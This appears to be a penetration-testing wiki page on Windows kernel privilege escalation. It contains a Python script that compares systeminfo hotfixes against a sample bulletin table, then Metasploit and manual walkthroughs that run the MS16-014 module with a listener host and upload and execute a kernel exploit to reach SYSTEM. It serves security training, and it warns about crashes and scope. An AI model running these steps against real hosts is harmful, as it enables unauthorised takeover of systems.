Windows Kernel Exploit


Last updated 8 months ago

A kernel is the core component of an operating system that manages hardware resources and enables communication between hardware and software. It has complete control over the system's resources, such as CPU, memory, and devices, and acts as a bridge between the hardware and applications.

In Windows the kernel is the NT kernel (ntoskrnl.exe, together with the executive and kernel-mode drivers), which follows the same general design as other kernels with some Windows-specific choices. Code runs in one of two processor modes:

  • User Mode: applications and most services run with restricted access to hardware and memory, and reach the kernel only through system calls.

  • Kernel Mode: the kernel, executive and device drivers run with unrestricted access to every resource, handling device control, memory management and scheduling.

This split is what makes a kernel bug so valuable to an attacker: a vulnerability in a kernel-mode component lets code that started in a low-privileged user-mode process execute with the kernel's authority, which is above any user or administrator account.

Windows Kernel Exploitation

Windows kernel exploits target vulnerabilities in the NT kernel or in a kernel-mode driver (win32k.sys and third-party drivers are frequent targets) to execute attacker-controlled code in kernel mode, typically to steal or elevate a token and spawn a SYSTEM shell. The details depend on the Windows version and the specific bug, but the process generally follows these steps:

Methods for Privilege Escalation:

  1. Identifying Kernel Vulnerabilities: collect the OS version, build, architecture and installed hotfixes from the target (systeminfo is usually enough) and compare them against known kernel vulnerabilities to find missing patches.

  2. Exploiting Vulnerabilities: obtain a public exploit for a missing patch, compile it for the target's architecture, transfer it to the target and run it from the low-privileged shell.

A failed kernel exploit usually crashes the machine (a blue screen) rather than failing cleanly, which can take down production services and lose unsaved data. Confirm that the exploit was written for the exact OS version, service pack and architecture before running it, prefer one you have tested in a matching lab, and agree with the client in advance whether kernel exploits are in scope.

Tools and Environment

Windows Exploit Suggester: compares the target's patch levels (the hotfix list from systeminfo) against Microsoft's vulnerability database to identify missing patches, and reports whether public exploits or Metasploit modules exist for them. Two caveats: the upstream AonCyberLabs script targets Python 2 and needs the xlrd module, and its database is the old Microsoft security-bulletin spreadsheet, which Microsoft stopped publishing in 2017, so it cannot see patches for newer systems. The maintained fork wesng (Windows Exploit Suggester - Next Generation) works from the Microsoft Security Update Guide instead.

Windows Kernel Exploits: the SecWiki GitHub repository of kernel exploits, indexed by MS bulletin and CVE, with source and prebuilt binaries. Treat the binaries as untrusted third-party code: read the source and compile it yourself for the target architecture where you can.
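The comparison that Windows Exploit Suggester performs, reduced to its essentials as an added example (my own code, not the tool's): it parses the OS name, build, architecture and installed hotfixes out of systeminfo output and reports bulletins that apply to that product with no matching KB installed. The systeminfo text and the three-row bulletin table are constructed sample data (the KB numbers are the bulletin KBs; the per-product component KBs that systeminfo usually lists are omitted), so a real run needs the full Microsoft spreadsheet.

```python
"""Miniature exploit suggester: parse `systeminfo` output and compare the
installed hotfixes against a table of Microsoft bulletins.

Added example for this page. It is NOT the Windows-Exploit-Suggester code;
the bulletin table and the systeminfo text below are constructed sample
data. In practice the table comes from Microsoft's bulletin/KB spreadsheet,
and the KB that systeminfo lists is often the per-product component KB
rather than the bulletin KB, so both must be present in the table.
"""
import re

# Constructed systeminfo output, trimmed to the fields the triage needs.
SAMPLE_SYSTEMINFO = """\
Host Name:                 WKSTN01
OS Name:                   Microsoft Windows 7 Professional
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB2533623
                           [02]: KB3057191
"""

# Constructed bulletin table: "kbs" names the update(s) whose presence means
# the bulletin is patched, "os" lists affected products as substrings of the
# systeminfo "OS Name" field, and "exploit" is what a tester looks up next.
BULLETINS = [
    {"id": "MS15-051", "title": "win32k.sys EoP (CVE-2015-1701)",
     "os": ["Windows 7", "Windows 8.1", "Windows Server 2012"],
     "kbs": {"KB3057191"}, "exploit": "MS15-051 from windows-kernel-exploits"},
    {"id": "MS16-014", "title": "WMI receive-notification EoP",
     "os": ["Windows 7", "Windows 8.1", "Windows 10"],
     "kbs": {"KB3134228"},
     "exploit": "exploit/windows/local/ms16_014_wmi_recv_notif"},
    {"id": "MS16-032", "title": "Secondary Logon EoP (CVE-2016-0099)",
     "os": ["Windows 7", "Windows 8.1", "Windows 10"],
     "kbs": {"KB3139914"}, "exploit": "MS16-032 from windows-kernel-exploits"},
]

KB_RE = re.compile(r"\bKB\d{6,7}\b")


def parse_systeminfo(text):
    """Extract OS name, version string, build number, architecture and the
    set of installed hotfix KBs from systeminfo output."""
    info = {"os_name": "", "version": "", "build": None, "arch": "unknown",
            "hotfixes": set()}
    for line in text.splitlines():
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        if key == "OS Name":
            info["os_name"] = value
        elif key == "OS Version":
            info["version"] = value
            m = re.search(r"Build (\d+)", value)
            info["build"] = int(m.group(1)) if m else None
        elif key == "System Type":
            info["arch"] = "x64" if "x64" in value else "x86"
        # Hotfix lines look like "[01]: KB2533623"; collect every KB we see.
        info["hotfixes"].update(KB_RE.findall(line))
    return info


def suggest(info, table=BULLETINS):
    """Return bulletins that apply to this OS and have no matching hotfix
    installed. A hit is a candidate to verify, not proof of exploitability:
    a later cumulative update can supersede the listed KB without it ever
    appearing in the hotfix list."""
    hits = []
    for b in table:
        if not any(product in info["os_name"] for product in b["os"]):
            continue                      # bulletin does not cover this product
        if b["kbs"] & info["hotfixes"]:
            continue                      # a listed fix is installed
        hits.append({"bulletin": b["id"], "title": b["title"],
                     "exploit": b["exploit"]})
    return hits


def report(text):
    """Human-readable triage: what the host is, and which bulletins to check."""
    info = parse_systeminfo(text)
    lines = [f"{info['os_name']} ({info['arch']}, build {info['build']}), "
             f"{len(info['hotfixes'])} hotfix(es) installed"]
    for h in suggest(info):
        lines.append(f"  missing {h['bulletin']}: {h['title']} -> {h['exploit']}")
    return lines


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_SYSTEMINFO)))
```

On the sample host MS15-051 drops out because its KB is installed, while MS16-014 and MS16-032 are reported. A hit from this or any suggester is only a lead: confirm the exact build and architecture against the exploit's stated targets before uploading it, because a mismatched kernel exploit blue-screens the host rather than failing cleanly, and on Windows 10 check the build number as well, since cumulative updates supersede individual KBs.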

Demonstration w/ Metasploit

# Assume a meterpreter session running as a low-privileged user
getuid      # which account are we running as?
getprivs    # which privileges does the current token hold?
getsystem   # meterpreter's built-in elevation techniques (named-pipe impersonation etc.); if they all fail, look for a kernel bug

# Let Metasploit suggest local exploits that match this session's OS and patch level
search suggester
use post/multi/recon/local_exploit_suggester
show options
set SESSION <id>   # session number from `sessions -l`
run

# Read up on each suggested module before using it: a kernel exploit that misses crashes the host
# Example: MS16-014 (WMI receive-notification) local privilege escalation
use exploit/windows/local/ms16_014_wmi_recv_notif
show options
set SESSION <id>
set LHOST <attacker ip>   # listener for the new, elevated session
run
getuid   # in the new session, expect NT AUTHORITY\SYSTEM

Demonstration Manual

# Assume a meterpreter session running as a low-privileged user
shell
systeminfo
# save the systeminfo output on the attacker machine as sysinfo.txt
# (the upstream script targets Python 2 and needs xlrd; use a python3 fork or adjust the interpreter)
python3 windows-exploit-suggester.py --update   # downloads the dated bulletin spreadsheet into the current directory
python3 windows-exploit-suggester.py --database [db.xls] --systeminfo sysinfo.txt   # [db.xls] is the file --update wrote

# Back in the meterpreter session: pick an exploit for one of the reported missing patches from
# windows-kernel-exploits, check it targets this exact version and architecture, compile it (or
# review the prebuilt binary), then stage and run it
cd Temp\\          # a directory the current user can write to and execute from
upload exploit.exe
shell              # upload is a meterpreter command; run the binary from a cmd shell
.\exploit.exe
whoami             # expect nt authority\system
References

GitHub - AonCyberLabs/Windows-Exploit-Suggester: compares a target's patch levels against the Microsoft vulnerability database to detect potentially missing patches, and reports whether public exploits and Metasploit modules exist for the missing bulletins.

GitHub - SecWiki/windows-kernel-exploits: a collection of Windows privilege-escalation vulnerabilities and their exploits.